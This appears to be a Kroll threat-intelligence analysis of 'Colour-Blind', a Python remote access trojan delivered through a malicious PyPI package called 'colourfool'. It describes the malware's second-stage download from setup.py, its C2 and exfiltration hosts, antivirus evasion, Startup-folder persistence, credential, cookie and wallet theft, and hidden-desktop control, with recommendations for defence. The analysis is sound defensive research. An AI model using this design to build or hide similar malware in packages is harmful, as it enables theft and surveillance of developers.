Wed, Mar 1, 2023

PyPI Packages Used to Deliver Python Remote Access Tools

Key Takeaways

  • Kroll has identified a fully featured information stealer and remote access tool (RAT) in the Python Package Index (PyPI) that it is calling “Colour-Blind”.
  • The malicious package was found as part of a project to obtain more awareness of initial attack vectors and uses a tool developed by Kroll’s threat intelligence team.
  • The “Colour-Blind” malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others.
 

Summary

As part of a project to obtain more awareness of initial attack vectors outside of the common phishing and web application exploitation, Kroll’s Cyber Threat Intelligence team has developed a tool to enable the enhanced monitoring of the Python Package Index (PyPI) to find and obtain malicious packages that are added to it.

We have discovered several packages with varying degrees of sophistication. In the following article, we analyze one of the more interesting malicious packages uncovered named “Colour-Blind” by Kroll. Colour-Blind is a fully featured information stealer and remote access tool (RAT) written in Python. In our research, we present a detailed analysis of the functionality and an assessment of the skill level of the actors who have created the malware.

Initial “Colourfool” Discovery

The package “colourfool” was detected by our tool, and a copy was archived for manual inspection shortly after it was uploaded to PyPI.

The package contained only one Python file of note, a suspiciously large “setup.py” last modified four days earlier.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 1 - Malicious Package Files and Meta Data

The sole purpose of the script seemed to be downloading a file from the internet, hiding from the user and executing it. The function, therefore, immediately seemed suspicious and likely malicious.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 2 – Second Stage Download and Execution

The function that provided the URL for download was also suspicious. It attempted to get a URL from a pastebin[.]com snippet and failing this returned a hardcoded discord content delivery network URL. Within a legitimate library, the use of hardcoded URLs for downloading executable resources “on the fly” is uncommon. This is particularly true when those URLs aren’t persistent and unlikely to be reachable after a short period of time.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 3 – Calculation of Second Stage URL

Other suspicious aspects of this script were the redirection of the standard out process to a “null device,” and the copying of the downloaded file into the same directory in which the interpreter “python.exe” resides. The copy functionality is preceded by a check, resulting in a forced exit if the file already exists. This is a common method the malware uses to avoid reinfection.

The second stage archive contained only one file “code.py” which was significantly larger than the script analyzed above; this new file was over 300 kilobytes (KB) and 2,038 lines of code.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 4 – Second Stage Meta Data

The new script contains a much larger imports section, including modules that enable malicious activity in the form of keylogging or stealing cookies.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 5 – Imports Section Showing Modules for Lower-Level Access

On looking through the code, some of it is blatantly malicious, for example, a function named “disable_antivirus” where the code attempts to add its location to the Microsoft Defender Antivirus exclusion path in Windows.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 6 – Overtly Malicious Function Name

Defense Evasion Behavior

In some other parts of the code, some attempt at obfuscation was made, although it mostly amounted to variables named with a simple pattern that contained only two characters. This was easy to turn “human readable” by utilizing a regular expression.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 7 – Obfuscated Variable Names

The combination of obfuscation alongside blatant malicious code indicates that it is unlikely that all the code was developed by a single entity. It is possible that the final developer mostly utilized other people’s code, adding it via copy and paste.

This is a similar function for obtaining a URL to that of the original script, however, in this second stage, the Pastebin snippet was encrypted.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 8 –Similar Function to Figure 3, However, a Decryption Routine is Now Present

The key for decrypting this URL was hardcoded in the script, enabling us to obtain the following domain: “clearstride[.]io”.

SSL information for this domain indicates that the certificate was created on the same date as the original “setup.py”  script.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 9 – SSL/TLS Certificate for C2 Domain

The malware starts with a call to an external website to retrieve geolocation and other IP- related information.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 10 – Code for Obtaining Public IP Address Information of Victim Host

A function that looks for indications of running inside a virtual machine is then called.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 11 – Code for Detection Virtualization Technologies

The final lookup is for the presence of any security research tools running in the system process list.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 12 – Security Tool Search

Typically, this kind of defense evasion behavior is commonly seen where the actor is checking to make sure that the malicious code is not running in an automated security sandbox, to avoid it being identified as malicious. In this case, however, after the malware gets the information, it does nothing with most of it. For example, the result from the security research tool search is never referenced or checked. This behavior adds strength to the hypothesis that the code has been plagiarized from multiple sources, and the final developer might not be particularly sophisticated in their methods.

Following this, the code tries to protect itself by using a combination of two functions to terminate processes it deems a threat. The first function is solely dedicated to killing Windows Task Manager.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 13 – Task Manger Kill Code

The second termination function loops through running processes and kills them based on the presence of hardcoded strings within the window’s text.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 14 – Code to Find and Terminate Processes Based on Identifying Strings

Establishing Persistence

The persistence mechanism the malware uses is to add a Visual Basic (VB) script named “Essentials.vbs” to the “Start Up” folder within the user’s “Start Menu”. The VB script runs a Windows batch file that the malware places in the same folder as “python.exe”. This batch file will start the malware using Python every time the user logs in.

The malware’s function for file exfiltration utilizes “transfer[.]sh,” an anonymous file transfer website that seems to be becoming popular amongst threat actors.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 15 – Data Exfiltration

There appears to be some code related to social engineering, generating an error message trying to persuade the user to re-run as administrator. There is also an embedded “Snake” game that appears to be a direct copy of the code from a GitHub repository. This game doesn’t seem to serve a purpose and didn’t start when the malware was run during testing. This could be another artifact indicating the irregular sourcing of this code.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 16 – Social Engineering Present Within the Source Code

The malware triggers multiple subprocesses, including threads for cookies, passwords and cryptocurrency wallet theft.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 17 – Multithreading Code

As a method of remote control, the malware starts a Flask web application, which it makes accessible to the internet via Cloudflare’s reverse tunnel utility “cloudflared,” bypassing any inbound firewall rules.

Colour-Blind Remote Access Tool (RAT) Functionality

The web application serves as a control panel for the malware, and the available options indicate functionality of a Remote Access Trojan (RAT). The web code for this page is basic and looks somewhat childish in aesthetic, giving rise to our tracking name for this malware “Colour-Blind,” based on the original PyPI package name (“colourfool”) and design choices made here.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 18 – Screenshot of the Malware Command Panel

The functionality of the RAT accessible from the control interface includes:

  • Tokens: Dumps to the screen login tokens for several application that use chromium via electron.io or chromium directly as an application framework, a notable example being Discord.
  • Passwords: Dumps passwords extracted from web browsers to screen
  • Cookies: Dumps all browser cookies to screen
  • Keys: Dumps to key loggers captured data to screen
  • Applications: Provides a list of running applications and a button to terminate them
  • Data Dump: Sends all captured data to the C2 URL
  • Screen: Shows screenshot of the user desktop and allows for rudimentary interaction such as key presses
  • IP: Looks up IP information and displays it to screen (using a different function to earlier)
  • Open Browser: Opens a browser to a given webpage
  • Run: Runs a command via operating system
  • Text Input: Sends keystroke to the machine
  • Phantom/Metamask: Steals cryptocurrency wallet information
 

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 19 – Screenshot of Remote Desktop Viewing Functionality

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 20 – Process Terminate Panel

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 21 – Real-Time Key Logger

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 22 – The RAT running and accessible via Cloudflare Tunnel

We further examined the code and extracted all the endpoints of the web application and found several that were not linked from the interface.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 23 – List of all Web Application Endpoints

The /camera endpoint allows the attacker to spy on an unsuspecting user via a web camera.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 24 – Web Camera functionality being used to Snoop

There is also a series of endpoints starting with the letters “hvnc,” which deal with a hidden desktop created on the victim’s machine. “/hvncmanager” allows for the starting of a web browser on this hidden desktop.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 25 – Opening of Chrome Web Browser on Hidden Desktop and not Visible to User

“/hvnc” will open the hidden desktop allowing for the threat actor to interact with it via a mouse and keyboard. The ability to open a web browser in a hidden manner allows the threat actor to interact with the victim’s internet accounts, even those which lock a session cookie to an IP address or other unique host identifiers.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 26 – Screenshot of Chrome running inside the Hidden Desktop Visible to Actor

“/hvncitem” enables custom commands to be executed on the hidden desktop via manipulation of the URL parameter “start”.

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 27 – Triggering a Process Start Via Manually Manipulating a Request to Malware

PyPI Packages Used to Deliver Python Remote Access Tools

Figure 28 – Manually Triggered Process Being Run on Hidden Desktop

What Colour-Blind Tells Us

From analysis of the Colour-Blind malware, it is evident that this RAT has a lot of interesting features. It shows us how the common functionality of malware can easily be written in modern languages such as Python. This malware also provides insights into how the democratization of cybercrime could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. As such, Kroll will continue to monitor open-source language repositories for further malware strains to enable further detection opportunities.

Kroll Recommendations

  • Ensure that all imported libraries are verified by developers
  • Consider using deployment processes that sandbox build targets before they are pushed to production
  • Use virtualized environments for development tasks that can be rapidly rebuilt should a malicious package be installed


Cyber Risk

Incident response, digital forensics, breach notification, managed detection services, penetration testing, cyber assessments and advisory.

Kroll Responder MDR

Stop cyberattacks. Kroll Responder managed detection and response is fueled by seasoned IR experts and frontline threat intelligence to deliver unrivaled response.

Malware Analysis and Reverse Engineering

Kroll’s Malware Analysis and Reverse Engineering team draws from decades of private and public-sector experience, across all industries, to deliver actionable findings through in-depth technical analysis of benign and malicious code.


24x7 Incident Response

Kroll is the largest global IR provider with experienced responders who can handle the entire security incident lifecycle.

Computer Forensics

Kroll's computer forensics experts ensure that no digital evidence is overlooked and assist at any stage of an investigation or litigation, regardless of the number or location of data sources.

Data Recovery and Forensic Analysis

Kroll's expertise establishes whether data was compromised and to what extent. We uncover actionable information, leaving you better prepared to manage a future incident.